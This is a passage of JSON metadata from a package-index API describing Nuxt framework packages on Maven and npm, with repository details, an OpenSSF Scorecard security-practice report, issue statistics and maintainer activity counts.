/v1/registries/repo1.maven.org/packages/org.mvnpm:nuxt/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:nuxt/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:nuxt/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:nuxt/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://repo.maven.apache.org/maven2","ecosystem":"maven","default":true,"packages_count":604801,"maintainers_count":0,"namespaces_count":79339,"keywords_count":0,"github":"maven-central","metadata":{"funded_packages_count":39644},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-04-03T06:29:38.544Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":14147555,"name":"org.mvnpm.at.nuxt:schema","ecosystem":"maven","description":"Nuxt types and default configuration","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"org.mvnpm.at.nuxt","versions_count":1,"first_release_published_at":"2026-03-29T22:19:14.000Z","latest_release_published_at":"2026-03-29T22:19:14.000Z","latest_release_number":"4.4.2","last_synced_at":"2026-05-11T01:23:04.297Z","created_at":"2026-03-29T22:30:17.430Z","updated_at":"2026-05-11T01:23:04.297Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm.at.nuxt/schema/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm.at.nuxt/schema/","metadata":{},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-03-27T22:54:07.000Z","size":135561,"stargazers_count":59951,"open_issues_count":922,"forks_count":5578,"subscribers_count":781,"default_branch":"main","last_synced_at":"2026-03-27T22:58:53.593Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-03-27T22:36:57.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":317,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31168404,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-29T21:28:10.185Z","status":"ssl_error","status_checked_at":"2026-03-29T21:23:32.226Z","response_time":89,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-03-29T22:31:59.365Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":29.64704261927198,"dependent_packages_count":42.38355423497933,"stargazers_count":0.39918618392780403,"forks_count":1.2635300279329609,"docker_downloads_count":null,"average":18.423328266528017},"purl":"pkg:maven/org.mvnpm.at.nuxt/schema","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm.at.nuxt:schema","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm.at.nuxt:schema","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm.at.nuxt:schema/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-28T09:00:16.075Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":701,"past_year_pull_requests_count":1163,"past_year_avg_time_to_close_issue":643507.1847826086,"past_year_avg_time_to_close_pull_request":224707.08352402746,"past_year_issues_closed_count":368,"past_year_pull_requests_closed_count":874,"past_year_pull_request_authors_count":115,"past_year_issue_authors_count":521,"past_year_avg_comments_per_issue":2.159771754636234,"past_year_avg_comments_per_pull_request":3.2768701633705932,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":467,"past_year_merged_pull_requests_count":766,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":221,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"OrbisK","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"Mini-ghost","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"BobbieGoede","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"cernymatej","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"antfu","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:schema/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:schema/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:schema/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:schema/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:schema/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:schema/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://repo.maven.apache.org/maven2","ecosystem":"maven","default":true,"packages_count":604801,"maintainers_count":0,"namespaces_count":79339,"keywords_count":0,"github":"maven-central","metadata":{"funded_packages_count":39644},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-04-03T06:29:38.544Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":14143671,"name":"org.mvnpm.at.nuxt:kit","ecosystem":"maven","description":"Toolkit for authoring modules and interacting with Nuxt","homepage":"https://nuxt.com/docs/4.x/api/kit","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"org.mvnpm.at.nuxt","versions_count":2,"first_release_published_at":"2026-03-28T23:15:04.000Z","latest_release_published_at":"2026-03-29T05:38:48.000Z","latest_release_number":"4.4.2","last_synced_at":"2026-05-11T01:23:04.895Z","created_at":"2026-03-28T23:30:15.945Z","updated_at":"2026-05-11T01:23:04.895Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm.at.nuxt/kit/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm.at.nuxt/kit/","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-03-31T09:56:32.924Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":29.673509187807873,"dependent_packages_count":42.42110430437969,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":36.04730674609378},"purl":"pkg:maven/org.mvnpm.at.nuxt/kit","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm.at.nuxt:kit","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm.at.nuxt:kit","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm.at.nuxt:kit/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:kit/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:kit/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:kit/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:kit/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:kit/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:kit/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://repo.maven.apache.org/maven2","ecosystem":"maven","default":true,"packages_count":604801,"maintainers_count":0,"namespaces_count":79339,"keywords_count":0,"github":"maven-central","metadata":{"funded_packages_count":39644},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-04-03T06:29:38.544Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":1096143,"name":"@nuxt/webpack-builder","ecosystem":"npm","description":"Webpack bundler for Nuxt","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":137,"first_release_published_at":"2021-04-04T15:53:11.371Z","latest_release_published_at":"2026-05-10T23:51:11.311Z","latest_release_number":"4.4.5","last_synced_at":"2026-05-11T23:31:17.395Z","created_at":"2022-04-08T10:39:37.502Z","updated_at":"2026-05-11T23:31:17.395Z","registry_url":"https://www.npmjs.com/package/@nuxt/webpack-builder","install_command":"npm install @nuxt/webpack-builder","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"alpha":"4.0.0-alpha.4","rc":"4.0.0-rc.0","latest":"4.4.5","3x":"3.21.5"}},"repo_metadata":{"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2023-12-19T00:39:48.000Z","size":110320,"stargazers_count":49067,"open_issues_count":998,"forks_count":4604,"subscribers_count":782,"default_branch":"main","last_synced_at":"2023-12-19T08:47:20.125Z","etag":null,"topics":["csr","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-03-1